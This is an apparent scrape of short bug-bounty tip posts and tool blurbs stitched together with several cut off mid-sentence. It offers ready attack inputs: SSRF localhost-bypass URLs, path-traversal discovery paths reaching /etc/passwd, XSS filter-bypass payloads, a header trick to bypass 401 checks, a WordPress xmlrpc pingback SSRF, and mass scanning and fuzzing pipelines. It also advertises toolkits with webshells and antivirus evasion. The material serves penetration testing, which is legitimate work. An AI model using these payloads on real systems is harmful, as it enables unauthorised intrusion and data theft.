The number of zeros in http://127.0.0.1 doesn't matter, So we can use the following payloads to bypass SSRF protection: http://127.1 http://127.000000000000000.001 http://127.000.000.00000000000000001 ... #bugbounty #bugbountytips

Content Discovery list critical once #1/3 /_session_start_/%0atest /+CSCOU+/../+CSCOE+/files/file_list.json /josso/%5C../web-console /gui/file_viewer.php?encrypt=N&target_folder=utilities&uploaded_filename=../../../../../../../etc/passwd #bugbounty #BugBountyTips…

What is Rate Limit ?

After 2 days of struggling, Bypassed a strong XSS filter on one of the private program. [ No '>' was allowed , no Html tags, Character length 35 ] XSS Payload used :- <svg onload="alert(1)" <="" svg="" @XssPayloads #BugBountyTips #BugBounty

K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetN...

#bugbountytips 1 - python /root/Sublist3r/sublist3r.py -d https://t.co/jE0pPCNb3W -o /root/subdomains.txt 2 - nmap -sn -Pn -n -iL subdomains.txt -oG out.txt 3 - awk -F" " '{print $2}' out.txt > outnew.txt 4 - masscan -iL outnew.txt --ports 0-65535 Leave no…

A powerful hacker toolkit collected more than 10 categories of open source scanners from Github - 安全行业从业者自研开源扫描器合辑 - We5ter/Scanners-Box

:no_entry: offsec batteries included. Contribute to jivoi/pentest development by creating an account on GitHub.

shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do ffuf -u http://$host/FUZZ -mc 200 -w spring-boot.txt ;done #bugbountytips #bugbountytip

If you find the host hosting the WordPress CMS, then try to see, if xmlrpc.php is open

Then, through the PingBack function, you can get Blind SSRF)

#bugbounty #hackerone #bugbountytip #bugbountytips

Testing for XSS via “javascript:” but it’s blocked by a WAF? Try these bypasses. Thanks for the #BugBountyTip, @SecurityMB! #BugBountyTips #HackWithIntigriti

an XSS payload with script src for short length inputs <script src=//⑮.₨></script> #bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking

My biggest contribution to github ever made: byp4xx, a simple bash script to bypass 403 forbidden error using methods mentioned in #bugbountytips: https://t.co/SIqr61piiu

everytime yu face a 401 Unauthorized respense add this header to the request : X-Custom-IP-Authorization: 127.0.0.1 #bugbountytips

How to Find Secret token , apikey, etc in js files & source code using bash (xkeys) | recon youtube.com/watch?v=_7EM7f… #bugbounty #recon #bash #bugbountytips The post How to Find Secret token , apikey, etc in js files & source code using bash (xke… appeared…

Company Sensitive Data in Internet Web Archive@3nc0d3dGuY cat subdomains.txt | waybackurls | tee waybackurls.txt | grep -E "\\.xls|\\.xlsx|\\.json|\\.pdf|\\.sql|\\.doc|\\.docx|\\.pptx" #cybersecurity #bugbounty #bugbountytips

Using Burp to test for IDOR #bugbounty #bugbountytips #cybersecuritytips portswigger.net/support/using-…